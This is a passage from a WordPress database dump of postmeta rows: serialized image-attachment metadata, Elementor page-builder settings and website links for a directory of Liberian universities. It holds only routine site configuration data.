";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34150,4946,'_wp_attached_file','2022/08/umu.jpg'),(34151,4946,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/08/umu.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"umu-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"umu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"umu-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"umu-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"umu-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"umu-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"umu-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"umu-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"umu-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"umu-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"umu-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34152,4944,'_thumbnail_id','4946'),(34153,4944,'_edit_last','42'),(34154,4944,'website_link','https://umu.edu.lr/'),(34155,4944,'_pods_university_logo','a:1:{i:0;i:4945;}'),(34168,4950,'_edit_lock','1661261607:42'),(34169,4950,'_last_editor_used_jetpack','block-editor'),(34170,4951,'_wp_attached_file','2022/08/zionseal-1.png'),(34171,4951,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:22:\"2022/08/zionseal-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"zionseal-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"zionseal-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34172,4950,'_edit_last','42'),(34173,4950,'website_link','https://amezion.edu.lr/'),(34174,4950,'_pods_university_logo','a:1:{i:0;i:4951;}'),(34181,4952,'_elementor_edit_mode','builder'),(34182,4952,'_elementor_template_type','wp-page'),(34183,4952,'_elementor_version','3.6.6'),(34184,4952,'_elementor_pro_version','3.7.1'),(34185,4952,'_wp_page_template','default'),(34186,4952,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(34188,4953,'_elementor_edit_mode','builder'),(34189,4953,'_elementor_template_type','wp-page'),(34190,4953,'_elementor_version','3.6.6'),(34191,4953,'_elementor_pro_version','3.7.1'),(34192,4953,'_wp_page_template','default'),(34193,4953,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(34195,4954,'_elementor_edit_mode','builder'),(34196,4954,'_elementor_template_type','wp-page'),(34197,4954,'_elementor_version','3.6.6'),(34198,4954,'_elementor_pro_version','3.7.1'),(34199,4954,'_wp_page_template','default'),(34200,4954,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"number\":7,\"columns\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c62050\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e0093e8\"}]},\"elements\":[{\"id\":\"c6ca465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(34203,4950,'_wp_old_date','2022-08-22'),(34206,4955,'_elementor_edit_mode','builder'),(34207,4955,'_elementor_template_type','wp-page'),(34208,4955,'_elementor_version','3.6.6'),(34209,4955,'_elementor_pro_version','3.7.1'),(34210,4955,'_wp_page_template','default'),(34211,4955,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"number\":7,\"columns\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c62050\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e0093e8\"}]},\"elements\":[{\"id\":\"c6ca465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(34214,4956,'_elementor_edit_mode','builder'),(34215,4956,'_elementor_template_type','wp-page'),(34216,4956,'_elementor_version','3.6.6'),(34217,4956,'_elementor_pro_version','3.7.1'),(34218,4956,'_wp_page_template','default'),(34219,4956,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"number\":7,\"columns\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c62050\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e0093e8\"}]},\"elements\":[{\"id\":\"c6ca465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(38587,3805,'_elementor_css','a:6:{s:4:\"time\";i:1770854588;s:5:\"fonts\";a:1:{i:0;s:6:\"Roboto\";}s:5:\"icons\";a:4:{i:0;s:10:\"fa-regular\";i:1;s:0:\"\";i:6;s:8:\"fa-solid\";i:28;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:4:{i:0;s:7:\"8cc0c42\";i:1;s:7:\"8cc0c42\";i:2;s:7:\"8cc0c42\";i:3;s:7:\"8cc0c42\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(34222,4957,'_elementor_edit_mode','builder'),(34223,4957,'_elementor_template_type','wp-page'),(34224,4957,'_elementor_version','3.6.6'),(34225,4957,'_elementor_pro_version','3.7.1'),(34226,4957,'_wp_page_template','default'),(34227,4957,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"number\":8,\"columns\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c62050\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e0093e8\"}]},\"elements\":[{\"id\":\"c6ca465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(34230,4930,'_elementor_controls_usage','a:3:{s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:2:{s:15:\"section_general\";a:7:{s:17:\"equal_height_cols\";i:1;s:9:\"post_type\";i:1;s:12:\"show_excerpt\";i:1;s:9:\"show_meta\";i:1;s:9:\"show_more\";i:1;s:6:\"number\";i:1;s:7:\"columns\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}}}}'),(34231,4944,'university_logo','4945'),(34233,4958,'_elementor_edit_mode','builder'),(34234,4958,'_elementor_template_type','wp-page'),(34235,4958,'_elementor_version','3.6.6'),(34236,4958,'_elementor_pro_version','3.7.1'),(34237,4958,'_wp_page_template','default'),(34238,4958,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"number\":8,\"columns\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c62050\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e0093e8\"}]},\"elements\":[{\"id\":\"c6ca465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(34240,4958,'_elementor_controls_usage','a:3:{s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:2:{s:15:\"section_general\";a:7:{s:17:\"equal_height_cols\";i:1;s:9:\"post_type\";i:1;s:12:\"show_excerpt\";i:1;s:9:\"show_meta\";i:1;s:9:\"show_more\";i:1;s:6:\"number\";i:1;s:7:\"columns\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}}}}'),(34242,4959,'_wp_attached_file','2022/08/amez.jpg'),(34243,4959,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/08/amez.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"amez-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"amez-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"amez-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"amez-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"amez-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"amez-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"amez-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"amez-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"amez-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"amez-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"amez-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34244,4950,'_thumbnail_id','4959'),(34245,4950,'university_logo','4951'),(34247,4960,'_edit_lock','1663415344:42'),(34248,4960,'_last_editor_used_jetpack','block-editor'),(34249,4961,'_wp_attached_file','2022/08/stella-maris-logo-1.jpg'),(34250,4961,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:31:\"2022/08/stella-maris-logo-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"stella-maris-logo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:30:\"stella-maris-logo-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34251,4962,'_wp_attached_file','2022/08/smpu.jpg'),(34252,4962,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/08/smpu.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"smpu-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"smpu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"smpu-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"smpu-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"smpu-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"smpu-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"smpu-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"smpu-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"smpu-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"smpu-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"smpu-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34253,4960,'_thumbnail_id','5075'),(34254,4960,'_edit_last','42'),(34255,4960,'website_link','http://smp.edu.lr/index.html'),(34256,4960,'_pods_university_logo','a:1:{i:0;i:4961;}'),(34258,4963,'_edit_lock','1661262766:42'),(34259,4963,'_last_editor_used_jetpack','block-editor'),(34260,4964,'_wp_attached_file','2022/08/auwa-logo-1.jpg'),(34261,4964,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:23:\"2022/08/auwa-logo-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"auwa-logo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"auwa-logo-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34262,4965,'_wp_attached_file','2022/08/auwa.jpg'),(34263,4965,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/08/auwa.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"auwa-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"auwa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"auwa-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"auwa-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"auwa-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"auwa-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"auwa-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"auwa-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"auwa-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"auwa-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"auwa-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2